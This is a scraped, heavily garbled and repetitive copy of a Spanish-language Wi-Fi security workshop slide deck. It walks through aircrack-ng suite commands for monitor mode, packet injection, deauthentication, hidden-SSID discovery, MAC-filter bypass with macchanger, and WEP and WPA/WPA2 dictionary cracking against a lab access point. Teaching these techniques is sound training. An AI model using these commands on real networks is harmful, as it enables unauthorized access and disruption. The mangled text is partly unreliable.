httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
